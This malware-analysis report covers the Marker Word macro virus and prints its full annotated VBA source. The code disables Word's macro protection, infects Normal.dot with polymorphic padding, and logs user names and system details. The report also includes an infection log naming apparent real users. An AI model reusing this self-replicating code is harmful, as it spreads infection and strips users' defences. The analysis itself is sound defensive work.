Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8e582bc4fecd63c2…

MALICIOUS

Office (OLE)

273.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 05f2e1118f037521cc9226a7388da151 SHA-1: bb8ba5855fdaadf28f024f08e518cbe1d2781689 SHA-256: 8e582bc4fecd63c2b462d1c5f08c1ae1cdecf184dd3d7aad6e8c23c5ff8f5040
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which runs automatically when the document is opened. ClamAV's 'Doc.Trojan.Marker-39' signature corroborates the verdict. The macro is not a downloader: the Document_Open procedure shown in full below contains no network, shell or process-creation call. It is a classic Word 97-era macro virus that infects the Normal template. On open it sets Application.Options.VirusProtection to False, suppresses the save-Normal prompt and writes the Word profile setting Security\Level to "0"; it then copies its own module between the opened document and Normal.dot (whichever side does not yet contain the marker string '1234567890!@#$%^&*()_'), regenerating its random '@@ comment lines on every copy as simple polymorphism, appends an infection-log comment carrying the date, the Word user name/address and the OS/version/CPU, and saves the Normal template. The only overt payload is a MsgBox on 13 October (CP1251 Russian text shown as mojibake, reading 'Congratulating myself on my birthday!'). Beyond the techniques listed above, the observed behaviour also maps to T1137.001 (Office Application Startup: Office Template Macros) and T1562.001 (Impair Defenses: Disable or Modify Tools).

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-39 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-39
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 440697 bytes
SHA-256: 9180b79d1e83e5b7c51b8cd92377fa382bb524e9c758fc771ee1f5faa619925a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' VBE export header of the module carved by olevba. VB_Name identifies it as the
' document's ThisDocument class module (VB_Base names the Normal template as its
' base), i.e. the module whose Document_Open event handler Word runs on open.

' Document_Open -- auto-run entry point of a Word 97-era (Word 8.0 per the report
' header) macro virus that infects the Normal template. It runs each time a
' document carrying this module, or an infected Normal.dot, is opened. In order:
'   1. switches Word's VirusProtection option off, suppresses the save-Normal
'      prompt and writes the Word profile setting Security\Level = "0";
'   2. picks a source and a destination module: document -> Normal template when
'      run from a document, Normal template -> ActiveDocument when run from
'      Normal.dot;
'   3. if the destination does not yet contain Marker, appends an infection-log
'      comment (timestamp, Word user name/address, OS/version/CPU) to the SOURCE,
'      then copies the source line by line into the destination, replacing every
'      non-empty line that contains an apostrophe followed by two @ signs with a
'      fresh random string (the junk comment lines interleaved below are that
'      padding, kept verbatim from the sample), and saves Normal.dot;
'   4. on 13 October shows a MsgBox (CP1251 Russian text, translated below).
' Nothing in this procedure downloads anything or starts another process. The
' Russian comments and strings are CP1251 bytes rendered here as Latin-1 mojibake.
' No parameters, no return value. On Error Resume Next silences every runtime
' failure (e.g. a refused VBProject access), so the routine never surfaces an error.
Private Sub Document_Open()
'@@ yz†”I�Ÿx�t�X^m„›�vY•HŽSiwOCXUŸo}_^‹HW–hf�
    ' Seed Rnd from the clock so the random padding differs on every infection.
    Randomize Timer
'@@QzžyXkhb…F›—O‘q�”i¤Šƒd£l�{�—X]’{™NQO„}jzF…ŒR‡„Yukkn‹l‚[BŠ�Ÿd—Gp}•TOˆfXf\]A�XZ‘o¡Š{ŒtR^‘Ipw
    ' Infection marker: the copy routine below runs only when this string is
    ' absent from the destination module; this Const line itself carries it over.
    Const Marker = "1234567890!@#$%^&*()_"
'@@—…sk£¡CD’ŒH›o\^JzV£’^�RDz^EZ„žx��Meb�O�¤¢Vœ…T�–›Š¢£ŸvHnnnT…\�A¡sGym•¢^RRˆQwdqPŸcX |s
    ' Swallow all runtime errors silently.
    On Error Resume Next
'@@�ŠR…^¤ts}Gz’lu €aE‰zA‹{d––{~x{Q—K[d‘£��‘€LB‡Lfa�N’’IP]B–ž—�iSŠyCtcOb…Ž_
    ' VBA quirk: only Dst is typed As Object here; Src is a Variant.
    Dim Src, Dst As Object
'@@¤i£\D�|o Ž|ŽA aB_[FMY•fWHZ†’�‘Pf}W€D|vK…ˆUWR¢vO•˜`}aO…Yq„\SŽˆ€—…d•LwThrr_f•
    Dim S As String
'@@n’Oiwayt^C“•W…‹‹—EHŠQw|`YQl�_{€Y—x¢‡VwKYJƒ�c�ŒvZ�’mwž~W™O z¤~KŠ¡~x_�’]eD gޤ“�‰”nŠ
    ' Defense evasion: no prompt when the Normal template is saved below ...
    Application.Options.SaveNormalPrompt = False
'@@PzbQ�`wzŠOV_vJ{Ž„W‘tk\Ÿm•„FoBˆz_{££ywO‡JT�Uro‰kFieiˆžpPoœK”œa’L
    ' ... and Word's macro-virus protection option is switched off.
    Application.Options.VirusProtection = False
'@@˜I•{†FšŽgp
    ' Writes Word's "Security" / "Level" profile setting to "0" -- presumably the
    ' lowest macro-security level; confirm against the Word 97 settings layout.
    System.ProfileString("Security", "Level") = "0"
    ' Original author's comment (CP1251 Russian, mojibake below) -- translation:
    ' "Determine the sources and the recipients of the body".
    'Îïðåäåëèì èñòî÷íèêè è ïîëó÷àòåëè òåëà
    ' Direction of infection: when running from Normal.dot, copy template ->
    ' active document; otherwise copy this document -> Normal template.
    If ThisDocument.Name = "Normal.dot" Then
'@@q^›˜�ANcJLŸŽpXCiW_QP…EŒTg�mš]dK�ix
     Set Dst = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
'@@†€t
     Set Src = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
'@@�•pK|O–aGwqSnˆOž`L^‰p\LyWj�v„[ UjJwdhM�žHEh[
    Else
'@@•Srrž‘^liˆ�u…s‘|_d`JB™J HFЉ˜x“¤ŠVfA¤”ywbS‚JeYZXm�„ZŒ¤‹F�ˆ‚^Ss[�CZnNnœž{ˆwJX}w\g`
     Set Src = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
'@@URpk†pr�{HO�££hbƒPp
     Set Dst = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
'@@“bT”¤Vz�^’{…’Mb†eB\_mb›œhdqr™eUc |mH]ajž‡`œ\gipcPk‚]Md~k›
    End If
'@@ �EC‘ŒŒLL`•”]Iœ‚Ÿ¢•\Hšpt]Žwkl–œŠoQDlkb~‡—y|Dc�b c”KD[š‰E’‘}“vŠ•`ƒ‹Ž
    ' Only infect a module that does not already carry the marker.
    If Not Dst.Find(Marker, 1, 1, -1, -1) Then
'@@X ~Mc˜lUŒ¡eA�™E W–a‘›iU“E{ITWtP|gOPRU[\~ƒ�j{—O|aKaƒzV|[‰OŸEP�uJœCl�~MŽDyX“šM^‚‚jE’POhk
     ' Append an infection-log comment block to the SOURCE first; it is copied
     ' into the destination with everything else, so the log accumulates on each
     ' hop (see the dated name/OS comment lines that trail this module).
     Src.InsertLines Src.CountOfLines + 1, ""
'@@�¢cO¢A�rJ`CqYŠk|` †Uk‰lMtW™U]K›e_‡`Žmwd[ljmJ•‡Z˜R¢›ŒZ�vœš�DVŽAIWyphc
     Src.InsertLines Src.CountOfLines + 1, "'" & Now() & " "
'@@FY_TpW˜R†]�ho£ iQ¢ž–™“}i‹£Q”nK[lU
     ' Leaks the Word user name and user address of the infecting machine.
     Src.InsertLines Src.CountOfLines + 1, "'" & Application.UserName & " " & Application.UserAddress
'@@uƒ‚šWEcyW\WnT�r�Iƒ…�Ž ¢�Hh�£žt€L”ML£xVbLJJl—š�m¤
     Src.InsertLines Src.CountOfLines + 1, "'" & System.OperatingSystem & " " & System.Version & " " & System.ProcessorType
'@@}bhMTeJšv‚x�eBRN—AD\q^¡`MXŠ
     Src.InsertLines Src.CountOfLines + 1, ""
'@@wƒ�i AYF�zdrvTdQŽ£„bPpy�~›O�ƒ�|^Ž’ŒhA“•¤›Yo‘„x
     ' Copy the whole source module into the destination: line i of Src becomes
     ' line i of Dst, inserted ahead of whatever Dst already held.
     For i = 1 To Src.CountOfLines
'@@vsW‚b\†Mrh�†j¢Z£’VweOC£‰bžDn‰X›�^dePEt“V’~‚€Kd�kiƒtsw_~kp�}dQrhl“KHTgP¤hNEKA�HunqšgUvM˜o•Y~
      S = Src.Lines(i, 1)
'@@C‹TnxtB’XphS™p”“_j‚}
      ' Polymorphism: any non-empty line containing apostrophe + "@@" is rebuilt.
      ' The pattern is assembled from Chr(64) so this code line is not itself matched.
      If Len(S) > 0 And InStr(1, S, "'" & Chr(64) & Chr(64)) > 0 Then
'@@†‘s£Œžf“IˆBVZle™h”DuŒPLn„pO~ƒ`i‹”lj“rž‡”Jy•€`^
       S = "'" & Chr(64) & Chr(64)
'@@VsTšO\lˆZl†£~Kƒg‰Kž£ ~E¡\F’‡TU�  €‹kA`iu†vOfVB–H“^ X]ij‡yŠM€‘Tp‡tyO‚
       ' 0..99 random characters with codes 65..164; codes above 127 are why the
       ' padding shows high-bit and undefined characters in this listing.
       For k = 1 To Int(Rnd * 100)
'@@QV
        S = S + Chr(Int(Rnd * 100) + 65)
'@@RŒqc`ƒ
       Next
'@@BmQOU
      End If
'@@NTlJžQ‚ezKn^HF~IJB˜K˜ež’ci‰£sRœOIx‡\ky’�€¢Œ‡ŸLcLh¡qš…nQ€cHŠ—K‡irw�Dt¤¤
      Dst.InsertLines i, S
'@@¢�XMO¡A—BbWkŸ
     Next
'@@iI„žV|qŠeˆƒ�~¡WjL�”™EJD›eU…VŸWƒo–†”h£’YS”–yL B‘ozf\€yTŽx—jD^]jnAqFCBvžxX�˜J�”‰ƒŸDeTTž¡�†Or¡˜iu‰
     ' Persist the Normal template (now infected, or the infection source).
     NormalTemplate.Save
'@@ŸSPHDq“‚’�PJh U~P�t“bžjJ—shWnJ™^˜LN
    End If
'@@~¤nX€�„_oY”[zXM‘› Mx†oW {�b} ™–~nA–Œ˜pwˆUL „¢Ržl‘z`”\ide¡ˆrG“tX„‡DlAU]ƒ}��£ £s—£SagŠ
    ' Date-triggered payload: 13 October only.
    If (Day(Now()) = 13) And (Month(Now()) = 10) Then
'@@e‡ˆŒ”‹nPDS]t |Œ\N Y_Ša›]X‘
        ' CP1251 mojibake; reads "Congratulating myself on my Birthday!" (with a
        ' typo in "Birthday" in the original) under the title "Hurray!!!!".
        MsgBox "Ïîçäðàâëÿþ ñåáÿ ñ Äåíì Ðîæäåíèÿ!", vbOKOnly, "Óðà!!!!"
'@@VgŠCaeQ¢Ivty{q|‹F_‹�‹E`�£wf]tjƒ¢E_�rLl�iObUQŽšgao|]™[E�ž ŠxxbGd¢“}��\~G^G
    End If
'@@VEh^n`›D “rQ—ve“ZriV�B‰“zIqž`�Aj¡£Iˆˆ¤vQSiIl˜Bgd™˜gœ•h™qN�gk_{NŠ•ŒsSG€trcg‡š{ƒ
End Sub


' Infection log written by the InsertLines calls in Document_Open on each copy:
' a timestamp, then the Word user name / user address, then OS, version and CPU.
' The Cyrillic entries are CP1251 text rendered as Latin-1 mojibake (transliterated:
' "Kartokhin Ruslan", "Khromenkov"); the log is a useful dating/attribution artefact.
'15.06.2001 15:38:13
'Êàðòîõèí Ðóñëàí
'Windows 4.10 Pentium


'21.06.2001 20:05:51
'Õðîìåíêîâ
'Windows NT 4.0 Pentium


'25.06.2001 12:50:05
'Õðîìåíêîâ
'W
... (truncated)